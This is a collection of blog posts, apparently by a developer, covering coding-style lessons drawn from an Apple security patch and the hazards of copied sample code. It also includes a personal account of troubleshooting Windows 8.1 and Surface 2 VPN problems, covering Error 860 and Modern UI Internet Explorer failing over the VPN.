The same is true for indentation. Indentation, when it’s caused by your IDE based on parsing your code, rather than by yourself pounding the space bar, is a valuable indication of program flow. If your indentation doesn’t match control flow, it’s because you aren’t enforcing indentation with an automated tool.

What the heck, enforce all kinds of style

Your IDE and your check-in process are a great place to enforce style standards to ensure that code is not confusing to the other developers on your team – or to yourself.

A little secret – one of the reasons I’m in this country in the first place is that I sent an eight-page fax to my bosses in the US, criticising their programming style and blaming (rightly) a number of bugs on the use of poor and inconsistent coding standards. This was true two decades ago using Fortran, and it’s true today in any number of different languages.

The style that was missed in this case – put braces around all your conditionally-executed statements.

I have other style recommendations that have worked for me in the past – meaningful variable names, enforced indenting, maximum level of indenting, comment guidelines, constant-on-the-left of comparisons, don’t include comparisons and assignments in the same line, one line does one thing, etc, etc.

Make sure you back the style requirements with statements as to what you are trying to do with the style recommendation. “Make the code look the same across the team” is a good enough reason, but “prevent incorrect flow” is better.

Make sure your compiler warns on unreachable code

gcc has the option “-Wunreachable-code”.

gcc disabled the option in 2010.

gcc silently disabled the option, because they didn’t want anyone’s build to fail.

This is not (IMHO) a smart choice. If someone has a warning enabled, and has enabled the setting to produce a fatal error on warnings, they WANT their build to fail if that warning is triggered, and they WANT to know when that warning can no longer be relied upon.

So, without a warning on unreachable code, you’re basically screwed when it comes to control flow going where you don’t want it to.

Compile with warnings set to fatal errors

And of course there’s the trouble that’s caused when you have dozens and dozens of warnings, so warnings are ignored. Don’t get into this state – every warning is a place where the compiler is confused enough by your code that it doesn’t know whether you intended to do that bad thing.

Let me stress – if you have a warning, you have confused the compiler.

This is a bad thing.

You can individually silence warnings (with much comments in your code, please!) if you are truly in need of a confusing operation, but for the most part, it’s a great saving on your code cleanliness and clarity if you address the warnings in a smart and simple fashion.

Don’t over-optimise or over-clean your code

The compiler has an optimiser.

It’s really good at its job.

It’s better than you are at optimising code, unless you’re going to get more than a 10-20% improvement in speed.

Making code shorter in its source form does not make it run faster. It may make it harder to read. For instance, this is a perfectly workable form of strstr:

const char * strstr(const char *s1, const char *s2)

{

  return (!s1||!s2||!*s2)?s1:((!*s1)?0:((*s1==*s2&&s1==strstr(s1+1,s2+1)-1)?s1:strstr(s1+1,s2)));

}

Can you tell me if it has any bugs in it?

What’s its memory usage? Processor usage? How would you change it to make it work on case-insensitive comparisons? Does it overflow buffers?

Better still: does it compile to smaller or more performant code, if you rewrite it so that an entry-level developer can understand how it works?

Now go and read the implementation from your CRT. It’s much clearer, isn’t it?

Release / announce patches when your customers can patch

Releasing the patch on Friday for iOS and on Tuesday for OS X may have actually been the correct move – but it brings home the point that you should release patches when you maximise the payoff between having your customers patch the issue and having your attackers reverse engineer it and build attacks.

Make your security announcements findable

Where is the security announcement at Apple? I go to apple.com and search for “iOS 7.0.6 security update”, and I get nothing. It’d be really nice to find the bulletin right there. If it’s easier to find your documentation from outside your web site than from inside, you have a bad search engine.

Finally, a personal note

People who know me may have the impression that I hate Apple. It’s a little more nuanced than that.

I accept that other people love their Apple devices. In many ways, I can understand why.

I have previously owned Apple devices – and I have tried desperately to love them, and to find why other people are so devoted to them. I have failed. My attempts at devotion are unrequited, and the device stubbornly avoids helping me do anything useful.

Instead of a MacBook Pro, I now use a ThinkPad. Instead of an iPad (remember, I won one for free!), I now use a Surface 2.

I feel like Steve Jobs turned to me and quoted Dr Frank N Furter: “I didn’t make him for you.”

So, no, I don’t like Apple products FOR ME. I’m fine if other people want to use them.

This article is simply about a really quick and easy example of how simple faults cause major errors, and what you can do, even as an experienced developer, to prevent them from happening to you.

Surface 2 –VPN bug disables Metro Internet Explorer

Update 2 – NOT FIXED

Yeah, so, I was apparently deluded, the problem is still here. It appears to be a bona-fide bug in Windows 8, with a Hotfix at http://support.microsoft.com/kb/2797356 – but that’s only for x86 versions of Windows, and not for the Surface 2.

Update – FIXED

Since I wrote this article, another issue caused me to reset my WMI database, by deleting everything under C:\Windows\System32\wbem\Repository and rebooting. After that, the VPN issues documented in this article have gone away.

Original article

I have a home VPN – everyone should, because it makes for securable access to your home systems when you are out and about, whether it’s at the Starbucks down the street, or half way across the world, like I was on my trip to China last week.

Useful as my home VPN is, and hard as it is to get working (see my last post on Windows 8 VPN problems), it’s only useful if I can get my entire computer to talk through the VPN.

Sidebar – VPN split tunneling

Note that I am not disputing the value of split tunneling in a VPN, which is where you might set up your client to use the VPN only for a range of addresses, so that (for example) a computer might connect to the VPN for connections to a work intranet, but use the regular connectivity for the major part of the public web. For this article, assume I want everything but my link-local traffic to be forwarded to my VPN.

So, in my last VPN post, we talked about setting up the client end of a VPN, and now I want to use it.

Connecting is the easy part, and once connected, most of my apps on the Surface 2 work quite happily, connecting to the Internet through my VPN.

All of the Desktop apps seem to work without restriction, but there are some odd gaps when it comes to using “Windows Store” apps, also known as “Metro” or “Modern UI” apps. Microsoft can’t call this “Metro” any more, even though that’s the most commonly used term for it, so I’ll follow their lead and call this the “Modern UI” [where UI stands for User Interface].

Most glaring of all is the Modern UI Internet Explorer, which doesn’t seem to allow any connections at all, simply displaying “This page can’t be displayed”. The exception to this is if I connect to a web server that is link-local to the VPN server.

I’d think this was a problem with the way I had set up my VPN server, or my client connection, if it weren’t for the fact that my Windows 8.1 laptop connects correctly to this same VPN with no issues on Modern or Desktop versions of Internet Explorer, and of course the undeniable feature that Internet Explorer for the Desktop on my Surface 2 also works correctly.

I’d like to troubleshoot and debug this issue, but of course, the only troubleshooting tools for networking in the Surface 2 run on the Desktop, and therefore work quite happily, as if nothing is wrong with the network. And from their perspective, this is true.

When Bagpuss goes to sleep, all his little friends go to sleep, too.

Of course, Internet Explorer has always been claimed by Microsoft to be a “part of the operating system”, and in Windows 8.1 RT, there is no difference in this respect.

Every Modern UI application which includes a web control, web view, or in some way asks the operating system or development framework to host a web page, also fails to reach its intended target through the VPN.

Technical Support – what’s their take?

Technical support had me try a number of things, including resetting the system, but none of their suggestions had any effect. Eventually I found a tech support rep who told me this is a bug, not that that is really what you’d call a resolution of my problem. These are the sort of things that make it clear that the Surface is still in its early days, and while impressive, has a number of niggling issues that need “fit and finish” work before significant other features get added.

Error 860 in Windows 8.1 / Surface VPN

It should be easy enough to set up a VPN in Windows, and everything should work well, because Microsoft has been doing these sorts of things for some years.

clip_image002

Sure enough, if you open up the Charms bar, choose Settings, Change PC Settings, and finally Network, you’re brought to this screen, with a nice big friendly button to add a VPN connection. Tapping on it leads me to the following screen:

clip_image004

No problems, I’ve already got these settings ready to go.

clip_image006

Probably not the best to name my VPN settings “New VPN”, but then I’m not telling you my VPN endpoint. So, let’s connect to this new connection.

clip_image008

So far, so good. Now it’s verifying my credentials…

clip_image010

And then we should see a successful connection message.

clip_image012

Not quite. For the search engines, here’s the text:

Error 860: The remote access connection completed, but authentication failed because of an error in the certificate that the client uses to authenticate the server.

This is upsetting, because of course I’ve spent some time setting the certificate correctly (more on that in a later post), and I know other machines are connecting just fine.

I’m sure that, at this point, many of you are calling your IT support team, and they’re reminding you that they don’t support Windows 8 yet, because some lame excuse about ‘not yet stable, official, standard, or Linux”.

Don’t take any of that. Simply open the Desktop.

What? Yes, Windows 8 has a Desktop. And a Command Prompt, and PowerShell. Even in the RT version.

Oh, uh, yeah, back to the instructions.

Forget navigating the desktop, just do Windows-X, and then W, to open the Network Connections group, like this:

clip_image014

Select the VPN network you’ve created, and select the option to “Change settings of this connection”:

clip_image016

In the Properties window that pops up, you need to select the Security tab:

clip_image018

OK, so that’s weird. The Authentication Group Box has two radio buttons – but neither one is selected. My Grandma had a radio like that, you couldn’t tell what station you were going to get when you turn it on – and the same is generally true for software. So, we should choose one:

clip_image020

It probably matters which one you choose, so check with your IT team (tell them you’re connecting from Windows 7, if you have to).

Then we can connect again:

clip_image022clip_image024clip_image026

And… we’re connected.

Now for another surprise, when you find that the Desktop Internet Explorer works just fine, but the “Modern UI” (formerly known as “Metro”) version of IE decides it will only talk to sites inside your LAN, and won’t talk to external sites. Oh, and that behavior is extended to any Metro app that embeds web content.

I’m still working on that one. News as I have it!

There is no such thing as “small sample code”

Every few months, something encourages me to make the tweet that:

There is no such thing as “small sample code”, every sample you publish is an SDK of its own

OK, so the choice of calling these “SDKs” is rooted in my Microsoft dev background, where “sample code” didn’t need documentation or bug tracking, whereas an SDK does. You can adjust the terminology to suit.

The basic point here is to remind you that you do not get to abrogate all responsibility by saying “this is sample code, you will need to add error checking and security”, even if you do say it in the article – even if you say it in the comments of the sample!

Why do I care so much? It’s only three lines of code!

Simply stated, I’ve seen too many cases where people have included three lines of code (or five, or twenty, the count doesn’t matter) into a program, and they’ve stepped away and shipped that code.

“It wasn’t my fault,” they say, when the incident happens, “I copied that code from a sample online.”

This is the point at which the re-education machine is engaged – because, of course, it totally is your fault, if you include code in your development without treating it with the same rigour as if you had written every line of it yourself. You will get punished – usually by having to stay late and fix it.

It’s also the sample writer’s fault.

He gave you the mini-SDK that you imported blindly into your application, without testing it, without checking errors in it, without appropriate security measures, and he brushed you off with “well, of course, you should add your own error checks and security magic to it”.

Here’s an example of what I’m talking about, courtesy of Troy Hunt linking to an ASP forum.

No, if you’re providing sample code on the Internet, it’s important to make sure it doesn’t embody BAD design; this is code that will be taken up by people by definition less keen, less eager, less smart and less motivated to do things right than you are – after all, rather than figuring out how to write this code for themselves, they are allowing you to do it for them, to teach them how it’s done. If you then teach them how it’s done badly, that’s how they will learn to do it – badly. And they will teach others.

So, instead, make your three line samples five lines, and add enough error checking that unexpected issues or other bad things will break the sample’s execution.

Oh yeah, and what about updates, when you find a horrendous bug – how do you distribute those?